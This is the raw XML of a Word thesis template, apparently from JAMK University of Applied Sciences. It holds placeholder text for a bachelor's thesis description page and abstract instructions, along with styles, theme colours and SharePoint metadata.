              </a:solidFill>
              <a:latin typeface="Calibri" panose="020F0502020204030204"/>
              <a:ea typeface="+mn-ea"/>
              <a:cs typeface="+mn-cs"/>
            </a:rPr>
            <a:t>Sales &amp; marketing</a:t>
          </a:r>
        </a:p>
      </dsp:txBody>
      <dsp:txXfrm>
        <a:off x="3780972" y="1348841"/>
        <a:ext cx="781112" cy="39055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oppimateriaalit.jamk.fi/raportointiohje/4-opinnaytetyon-rakenne/4-1-opinnaytetyon-alkuosa/4-1-2-kuvailulehti/%20-%20avainsanat"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64C45C3B908A14D91422B08761EE41D"/>
        <w:category>
          <w:name w:val="Yleiset"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{2ECF4186-1D85-7141-939B-F4E254F43C2A}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00904854" w:rsidRDefault="00C25DB5">
          <w:pPr>
            <w:pStyle w:val="B64C45C3B908A14D91422B08761EE41D"/>
          </w:pPr>
          <w:r w:rsidRPr="006E26F6">
            <w:t>Last name, First name &amp; Last name, First name</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="80153073270D884B8C6BCAA3FC384CFF"/>
        <w:category>
          <w:name w:val="Yleiset"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{E815850B-67BD-0448-8F75-5D81D0550187}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00904854" w:rsidRDefault="00C25DB5">
          <w:pPr>
            <w:pStyle w:val="80153073270D884B8C6BCAA3FC384CFF"/>
          </w:pPr>
          <w:r w:rsidRPr="006E26F6">
            <w:t>Title and possible subtitle</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="D65329EA88E36A44829CE7F662B4561E"/>
        <w:category>
          <w:name w:val="Yleiset"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{1481D012-B5D6-A842-A23E-64BF9B8BD445}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00904854" w:rsidRDefault="00C25DB5">
          <w:pPr>
            <w:pStyle w:val="D65329EA88E36A44829CE7F662B4561E"/>
          </w:pPr>
          <w:r w:rsidRPr="00E0773C">
            <w:rPr>
              <w:rStyle w:val="PlaceholderText"/>
            </w:rPr>
            <w:t>Kirjoita tekstiä napsauttamalla tai napauttamalla tätä.</w:t>
          </w:r>
        </w:p>
        <w:bookmarkStart w:id="0" w:name="_Hlk59002208"/>
        <w:bookmarkEnd w:id="0"/>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="96C8C72DE45E0343B9104BC35C1DCA3F"/>
        <w:category>
          <w:name w:val="Yleiset"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{08AB4958-CC92-DB41-AF1D-41C23A6EE2CE}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00904854" w:rsidRDefault="00C25DB5">
          <w:pPr>
            <w:pStyle w:val="96C8C72DE45E0343B9104BC35C1DCA3F"/>
          </w:pPr>
          <w:r w:rsidRPr="006E26F6">
            <w:t>40 pages.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="A8285C3B2A2DF144AA25182189D8B061"/>
        <w:category>
          <w:name w:val="Yleiset"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{B8010177-AD28-7D47-A3F8-BF82BD37E510}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00904854" w:rsidRDefault="00C25DB5">
          <w:pPr>
            <w:pStyle w:val="A8285C3B2A2DF144AA25182189D8B061"/>
          </w:pPr>
          <w:bookmarkStart w:id="1" w:name="_Hlk59002208"/>
          <w:r w:rsidRPr="006E26F6">
            <w:t xml:space="preserve">Technology, </w:t>
          </w:r>
          <w:r>
            <w:t>C</w:t>
          </w:r>
          <w:r w:rsidRPr="006E26F6">
            <w:t xml:space="preserve">ommunication and </w:t>
          </w:r>
          <w:r>
            <w:t>T</w:t>
          </w:r>
          <w:r w:rsidRPr="006E26F6">
            <w:t>ransport. Degree Programme in Logistics Engineering. Bachelor</w:t>
          </w:r>
          <w:r>
            <w:t>’</w:t>
          </w:r>
          <w:r w:rsidRPr="006E26F6">
            <w:t>s thesis</w:t>
          </w:r>
          <w:bookmarkEnd w:id="1"/>
          <w:r w:rsidRPr="006E26F6">
            <w:t>.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="A29739FF7FF92F40935B9C9AC4D23B9D"/>
        <w:category>
          <w:name w:val="Yleiset"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{09630505-6724-A442-BAAF-A8CF4EB6AABC}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00904854" w:rsidRDefault="00C25DB5">
          <w:pPr>
            <w:pStyle w:val="A29739FF7FF92F40935B9C9AC4D23B9D"/>
          </w:pPr>
          <w:r w:rsidRPr="006E26F6">
            <w:t>Yes/No</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="3BFC903BB1386F49861F4A48BD9BBC7C"/>
        <w:category>
          <w:name w:val="Yleiset"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{CCFE01F6-58E9-2E43-9640-805833450DCE}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00904854" w:rsidRDefault="00C25DB5">
          <w:pPr>
            <w:pStyle w:val="3BFC903BB1386F49861F4A48BD9BBC7C"/>
          </w:pPr>
          <w:r w:rsidRPr="006E26F6">
            <w:t>English</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="AF0156AA46A02C4D8CAF189FA159EDA4"/>
        <w:category>
          <w:name w:val="Yleiset"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{D8A99C43-7CF9-7149-85BA-6D5DA19CA583}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="005676BF" w:rsidRPr="006E26F6" w:rsidRDefault="00C25DB5" w:rsidP="002E3064">
          <w:pPr>
            <w:pStyle w:val="DescriptionAbstract"/>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006E26F6">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>When completing this form, start from this field, on the row under the instructions, so that the font size remains 11.</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="005676BF" w:rsidRPr="006E26F6" w:rsidRDefault="00C25DB5" w:rsidP="002E3064">
          <w:pPr>
            <w:pStyle w:val="DescriptionAbstract"/>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006E26F6">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>The basic structure of the abstract is as follows:</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="005676BF" w:rsidRPr="006E26F6" w:rsidRDefault="00C25DB5" w:rsidP="002E3064">
          <w:pPr>
            <w:pStyle w:val="DescriptionAbstract"/>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006E26F6">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>• background</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>,</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="005676BF" w:rsidRPr="006E26F6" w:rsidRDefault="00C25DB5" w:rsidP="002E3064">
          <w:pPr>
            <w:pStyle w:val="DescriptionAbstract"/>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006E26F6">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>• task and objectives</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>,</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="005676BF" w:rsidRPr="006E26F6" w:rsidRDefault="00C25DB5" w:rsidP="002E3064">
          <w:pPr>
            <w:pStyle w:val="DescriptionAbstract"/>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006E26F6">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>• implementation method</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>,</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="005676BF" w:rsidRPr="006E26F6" w:rsidRDefault="00C25DB5" w:rsidP="002E3064">
          <w:pPr>
            <w:pStyle w:val="DescriptionAbstract"/>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006E26F6">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>• results</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>, and</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="005676BF" w:rsidRPr="006E26F6" w:rsidRDefault="00C25DB5" w:rsidP="002E3064">
          <w:pPr>
            <w:pStyle w:val="DescriptionAbstract"/>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006E26F6">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>•</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="006E26F6">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>conclusions.</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="005676BF" w:rsidRPr="00C8394B" w:rsidRDefault="00C25DB5" w:rsidP="002E3064">
          <w:pPr>
            <w:autoSpaceDE w:val="0"/>
            <w:autoSpaceDN w:val="0"/>
            <w:adjustRightInd w:val="0"/>
            <w:rPr>
              <w:rFonts w:ascii="MS Shell Dlg 2" w:hAnsi="MS Shell Dlg 2" w:cs="MS Shell Dlg 2"/>
              <w:sz w:val="17"/>
              <w:szCs w:val="17"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006E26F6">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>In other words, the abstract summarises the work that has been done</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
              <w:sz w:val="26"/>
              <w:szCs w:val="26"/>
            </w:rPr>
            <w:t>—</w:t>
          </w:r>
          <w:r w:rsidRPr="006E26F6">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>not the content of the r</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>e</w:t>
          </w:r>
          <w:r w:rsidRPr="006E26F6">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>port. If there is room, the content of the report may be briefly mentioned.</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="005676BF" w:rsidRPr="006E26F6" w:rsidRDefault="00C25DB5" w:rsidP="002E3064">
          <w:pPr>
            <w:pStyle w:val="DescriptionAbstract"/>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
          </w:pPr>
          <w:r w:rsidRPr="006E26F6">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>The entire space reserved for the abstract must be used.</w:t>
          </w:r>
        </w:p>
        <w:p w:rsidR="00904854" w:rsidRDefault="00C25DB5">
          <w:pPr>
            <w:pStyle w:val="AF0156AA46A02C4D8CAF189FA159EDA4"/>
          </w:pPr>
          <w:r w:rsidRPr="006E26F6">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve">The abstract should be written in the past tense and </w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t>in the</w:t>
          </w:r>
          <w:r w:rsidRPr="006E26F6">
            <w:rPr>
              <w:lang w:val="en-US"/>
            </w:rPr>
            <w:t xml:space="preserve"> passive voice. The text must not refer to the thesis, i.e. the words ‘this thesis’ must not be used.</w:t>
          </w:r>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="0A9452C405C3B049939415731DB4D054"/>
        <w:category>
          <w:name w:val="Yleiset"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{AC83214B-561F-6345-8738-7E899F416672}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00904854" w:rsidRDefault="00C25DB5">
          <w:pPr>
            <w:pStyle w:val="0A9452C405C3B049939415731DB4D054"/>
          </w:pPr>
          <w:r w:rsidRPr="006E26F6">
            <w:t xml:space="preserve">See Project Reporting Instructions, </w:t>
          </w:r>
          <w:r>
            <w:t>S</w:t>
          </w:r>
          <w:r w:rsidRPr="006E26F6">
            <w:t>ection 4.1.2</w:t>
          </w:r>
          <w:r>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:hyperlink r:id="rId4" w:history="1">
            <w:r w:rsidRPr="003E7D05">
              <w:rPr>
                <w:rStyle w:val="Hyperlink"/>
                <w:rFonts w:eastAsiaTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
                <w:lang w:eastAsia="en-US"/>
              </w:rPr>
              <w:t>https://oppimateriaalit.jamk.fi/raportointiohje/4-opinnaytetyon-rakenne/4-1-opinnaytetyon-alkuosa/4-1-2-kuvailulehti/ - avainsanat</w:t>
            </w:r>
          </w:hyperlink>
        </w:p>
      </w:docPartBody>
    </w:docPart>
    <w:docPart>
      <w:docPartPr>
        <w:name w:val="60B3FC4D31716F4CA89A6EDA43318CD1"/>
        <w:category>
          <w:name w:val="Yleiset"/>
          <w:gallery w:val="placeholder"/>
        </w:category>
        <w:types>
          <w:type w:val="bbPlcHdr"/>
        </w:types>
        <w:behaviors>
          <w:behavior w:val="content"/>
        </w:behaviors>
        <w:guid w:val="{E1B6E353-2FB5-7646-8957-ED0689492C65}"/>
      </w:docPartPr>
      <w:docPartBody>
        <w:p w:rsidR="00904854" w:rsidRDefault="00C25DB5">
          <w:pPr>
            <w:pStyle w:val="60B3FC4D31716F4CA89A6EDA43318CD1"/>
          </w:pPr>
          <w:r w:rsidRPr="006E26F6">
            <w:t>For example, the confidentiality marking of the thesis appendix</w:t>
          </w:r>
          <w:r>
            <w:t>.</w:t>
          </w:r>
          <w:r w:rsidRPr="006E26F6">
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r>
            <w:t>S</w:t>
          </w:r>
          <w:r w:rsidRPr="006E26F6">
            <w:t xml:space="preserve">ee Project Reporting Instructions, </w:t>
          </w:r>
          <w:r>
            <w:t>S</w:t>
          </w:r>
          <w:r w:rsidRPr="006E26F6">
            <w:t>ection 4.1.2</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MS Shell Dlg 2">
    <w:altName w:val="Sylfaen"/>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C05"/>
    <w:rsid w:val="0014028F"/>
    <w:rsid w:val="002E3064"/>
    <w:rsid w:val="0030256C"/>
    <w:rsid w:val="005676BF"/>
    <w:rsid w:val="005F73AC"/>
    <w:rsid w:val="0071050E"/>
    <w:rsid w:val="007C1982"/>
    <w:rsid w:val="007E5067"/>
    <w:rsid w:val="00904854"/>
    <w:rsid w:val="00992C05"/>
    <w:rsid w:val="009F1A5C"/>
    <w:rsid w:val="00C25DB5"/>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i-FI" w:eastAsia="fi-F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4C45C3B908A14D91422B08761EE41D">
    <w:name w:val="B64C45C3B908A14D91422B08761EE41D"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="80153073270D884B8C6BCAA3FC384CFF">
    <w:name w:val="80153073270D884B8C6BCAA3FC384CFF"/>
  </w:style>
  <w:style w:type="character" w:styleId="PlaceholderText">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rPr>
      <w:color w:val="808080"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="D65329EA88E36A44829CE7F662B4561E">
    <w:name w:val="D65329EA88E36A44829CE7F662B4561E"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="96C8C72DE45E0343B9104BC35C1DCA3F">
    <w:name w:val="96C8C72DE45E0343B9104BC35C1DCA3F"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="A8285C3B2A2DF144AA25182189D8B061">
    <w:name w:val="A8285C3B2A2DF144AA25182189D8B061"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="A29739FF7FF92F40935B9C9AC4D23B9D">
    <w:name w:val="A29739FF7FF92F40935B9C9AC4D23B9D"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="3BFC903BB1386F49861F4A48BD9BBC7C">
    <w:name w:val="3BFC903BB1386F49861F4A48BD9BBC7C"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="DescriptionAbstract">
    <w:name w:val="Description_Abstract"/>
    <w:basedOn w:val="Normal"/>
    <w:qFormat/>
    <w:pPr>
      <w:spacing w:before="60" w:after="60"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:eastAsia="Times New Roman" w:hAnsi="Calibri" w:cs="Times New Roman"/>
      <w:color w:val="000000" w:themeColor="text1"/>
      <w:sz w:val="22"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="AF0156AA46A02C4D8CAF189FA159EDA4">
    <w:name w:val="AF0156AA46A02C4D8CAF189FA159EDA4"/>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri"/>
      <w:color w:val="0D004C"/>
      <w:sz w:val="24"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="0A9452C405C3B049939415731DB4D054">
    <w:name w:val="0A9452C405C3B049939415731DB4D054"/>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="60B3FC4D31716F4CA89A6EDA43318CD1">
    <w:name w:val="60B3FC4D31716F4CA89A6EDA43318C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ema">
  <a:themeElements>
    <a:clrScheme name="JAMK Word">
      <a:dk1>
        <a:srgbClr val="000000"/>
      </a:dk1>
      <a:lt1>
        <a:srgbClr val="FFFFFF"/>
      </a:lt1>
      <a:dk2>
        <a:srgbClr val="0D004C"/>
      </a:dk2>
      <a:lt2>
        <a:srgbClr val="E7E6E6"/>
      </a:lt2>
      <a:accent1>
        <a:srgbClr val="E2066E"/>
      </a:accent1>
      <a:accent2>
        <a:srgbClr val="FDB913"/>
      </a:accent2>
      <a:accent3>
        <a:srgbClr val="00B39C"/>
      </a:accent3>
      <a:accent4>
        <a:srgbClr val="EA590C"/>
      </a:accent4>
      <a:accent5>
        <a:srgbClr val="3FB8E2"/>
      </a:accent5>
      <a:accent6>
        <a:srgbClr val="A5A5A5"/>
      </a:accent6>
      <a:hlink>
        <a:srgbClr val="3FB9E3"/>
      </a:hlink>
      <a:folHlink>
        <a:srgbClr val="7861A8"/>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7b10cfb-8edd-482e-87bc-5e925bec9574">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1E218635C43C942BC7519C2BB5ECFF4" ma:contentTypeVersion="12" ma:contentTypeDescription="Create a new document." ma:contentTypeScope="" ma:versionID="a77d1889d16378a476144029b75084b2">
  <xsd:schema xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:xs="http://www.w3.org/2001/XMLSchema" xmlns:p="http://schemas.microsoft.com/office/2006/metadata/properties" xmlns:ns2="67b10cfb-8edd-482e-87bc-5e925bec9574" xmlns:ns3="aa7900d4-6e64-41c3-8b2b-56b2da125690" targetNamespace="http://schemas.microsoft.com/office/2006/metadata/properties" ma:root="true" ma:fieldsID="44fc76cd97096a01dc4ef1a48a99ced0" ns2:_="" ns3:_="">
    <xsd:import namespace="67b10cfb-8edd-482e-87bc-5e925bec9574"/>
    <xsd:import namespace="aa7900d4-6e64-41c3-8b2b-56b2da12569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b10cfb-8edd-482e-87bc-5e925bec95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6af2609-c3e5-4c49-b9fa-7b01c8d29870"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a7900d4-6e64-41c3-8b2b-56b2da12569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9C518F-71C7-4798-BBD3-6E0284151261}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/sharepoint/v3/contenttype/forms"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps2.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{7D454664-41E5-4DAE-BF42-2F51A83254C1}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/2006/metadata/properties"/>
    <ds:schemaRef ds:uri="http://schemas.microsoft.com/office/infopath/2007/PartnerControls"/>
    <ds:schemaRef ds:uri="67b10cfb-8edd-482e-87bc-5e925bec9574"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps3.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{63A732FB-D15D-4F46-8527-AF5534CEAF38}">
  <ds:schemaRefs>
    <ds:schemaRef ds:uri="http://schemas.openxmlformats.org/officeDocument/2006/bibliography"/>
  </ds:schemaRefs>
</ds:datastoreItem>
</file>

<file path=customXml/itemProps4.xml><?xml version="1.0" encoding="utf-8"?>
<ds:datastoreItem xmlns:ds="http://schemas.openxmlformats.org/officeDocument/2006/customXml" ds:itemID="{95529B08-19A6-4E4C-8142-9800C270A78F}"/>
</file>

<file path=docProps/app.xml><?xml version="1.0" encoding="utf-8"?>
<Properties xmlns="http://schemas.openxmlformats.org/officeDocument/2006/extended-properties" xmlns:vt="http://schemas.openxmlformats.org/officeDocument/2006/docPropsVTypes">
  <Template>Normal.dotm</Template>
  <TotalTime>0</TotalTime>
  <Pages>24</Pages>
  <Words>4417</Words>
  <Characters>25183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Thesis Reporting Template 2022</vt:lpstr>
    </vt:vector>
  </TitlesOfParts>
  <Manager/>
  <Company/>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>29541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Reporting Template 2022</dc:title>
  <dc:subject>Thesis</dc:subject>
  <dc:creator/>
  <cp:keywords>JAMK Thesis Template;Thesis;reporting;template</cp:keywords>
  <dc:description>ONT JAMK</dc:description>
  <cp:lastModifiedBy/>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-04-05T03:48:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-04-14T06:24:00Z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0x01010061E218635C43C942BC7519C2BB5ECFF4</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="Avainsanat">
    <vt:lpwstr>10;#opinnäytetyö|96b1f92f-9d52-4634-866c-478691c8f5f5</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MediaServiceImageTags">
    <vt:lpwstr/>
  </property>
</Properties>
</file>